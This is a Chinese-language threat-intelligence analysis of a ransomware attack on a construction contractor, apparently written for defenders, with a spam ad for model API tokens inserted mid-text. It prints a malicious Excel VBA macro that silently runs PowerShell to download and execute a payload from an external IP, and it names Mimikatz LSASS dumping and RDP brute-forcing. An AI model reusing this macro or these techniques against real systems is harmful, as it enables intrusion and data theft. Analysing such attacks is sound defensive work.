1. 事件背景与行业影响
2023年第二季度,美国知名建筑承包商Marshal Renee Construction遭遇Securotrop勒索软件组织的针对性攻击。根据零零信安暗网监测平台获取的威胁情报,攻击者声称窃取了超过2TB的工程设计图纸、投标文件及员工社保信息,并要求支付价值380万美元的加密货币作为赎金。这起事件暴露出传统建筑业在数字化转型过程中面临的新型网络安全挑战。
建筑行业因其特殊的业务属性,往往包含三类高价值数字资产:
- 工程设计文件(BIM模型/CAD图纸)
- 商业合同与投标资料
- 施工现场物联网设备管理权限
Securotrop组织在此次攻击中展现出的战术特点值得警惕:
- 通过钓鱼邮件渗透企业OA系统
- 利用未更新的财务软件漏洞横向移动
- 对工程文件进行双重加密(AES+RSA)
- 威胁公布敏感数据至暗网交易平台
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 勒索软件攻击链深度分析
2.1 初始入侵向量溯源
攻击者伪装成建材供应商发送带有恶意宏的Excel报价单,文档内嵌的VBA脚本会执行以下操作:
vba复制Sub Auto_Open()
Dim cmd As String
cmd = "powershell -nop -w hidden -c ""IEX (New-Object Net.WebClient).DownloadString('http://45.xx.xx.xx/payload.ps1')"""
Shell cmd, vbHide
End Sub
该脚本从C2服务器下载二级载荷,使用Living Off the Land(LotL)技术规避检测,主要利用系统内置的:
- PowerShell
- Certutil
- Bitsadmin
2.2 内网横向移动技术
攻击者在内网渗透阶段采用三种主要技术:
- 凭证窃取:使用Mimikatz转储LSASS进程内存
- 漏洞利用:利用财务软件NetSuite的CVE-2022-xxxx漏洞获取管理员权限
- RDP爆破:针对未启用双因素认证的工程部门终端
关键发现:攻击者特别关注了ProjectWise文件协作系统的访问权限,该系统存储着所有在建项目的BIM模型
